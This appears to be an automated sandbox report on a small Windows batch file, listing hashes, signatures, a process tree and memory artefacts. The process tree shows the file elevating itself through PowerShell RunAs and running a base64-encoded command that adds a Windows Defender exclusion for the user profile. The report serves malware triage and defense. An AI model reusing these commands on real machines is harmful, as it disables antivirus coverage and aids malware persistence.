Analysis

  • max time kernel
    119s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 20:43

General

  • Target

    613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat

  • Size

    500B

  • MD5

    c7e2ec60b2f5e2d1061e128318cd3f61

  • SHA1

    54b2846e89d35a67698765d0b3920a1f05784bdd

  • SHA256

    613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38

  • SHA512

    8faabdcd2caf1e282ff7e6f5971a60e957ba5355d12a35db4b61b3de0672d9983791f4b05fab5656459733f188eb531749f64632619c9c192c31570b8a523869

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat' -ArgumentList 'am_admin'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAJwApAA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2712

Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          391ceb5b567adbb448b6d75fbbd5778f

          SHA1

          169dc0ab681e6fc7a28bcaff24027b4164aab88f

          SHA256

          80a0372a7304d947b0b5e41ddf93369ba202287226c784dcbfecc9f628d9d188

          SHA512

          75eb26ebf2c69f9b496ef98e23f666d1aa0b0f4a5ba6c09b6b9bc5b07c80eb52209ca9577618c043f084560672d45cfc62771c7b6f4ce599fee3582d5e4e15c7

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GJJPU5F0D6JPKENCHGKN.temp

          Filesize

          7KB

          MD5

          391ceb5b567adbb448b6d75fbbd5778f

          SHA1

          169dc0ab681e6fc7a28bcaff24027b4164aab88f

          SHA256

          80a0372a7304d947b0b5e41ddf93369ba202287226c784dcbfecc9f628d9d188

          SHA512

          75eb26ebf2c69f9b496ef98e23f666d1aa0b0f4a5ba6c09b6b9bc5b07c80eb52209ca9577618c043f084560672d45cfc62771c7b6f4ce599fee3582d5e4e15c7

        • memory/1624-12-0x00000000029C4000-0x00000000029C7000-memory.dmp

          Filesize

          12KB

        • memory/1624-5-0x0000000001FA0000-0x0000000001FA8000-memory.dmp

          Filesize

          32KB

        • memory/1624-11-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

          Filesize

          9.6MB

        • memory/1624-13-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

          Filesize

          9.6MB

        • memory/1624-4-0x000000001B260000-0x000000001B542000-memory.dmp

          Filesize

          2.9MB

        • memory/1624-14-0x00000000029CB000-0x0000000002A32000-memory.dmp

          Filesize

          412KB

        • memory/2712-15-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

        • memory/2712-16-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

          Filesize

          9.6MB

        • memory/2712-18-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

        • memory/2712-17-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

        • memory/2712-19-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

          Filesize

          9.6MB

        • memory/2712-20-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

        • memory/2712-21-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

          Filesize

          9.6MB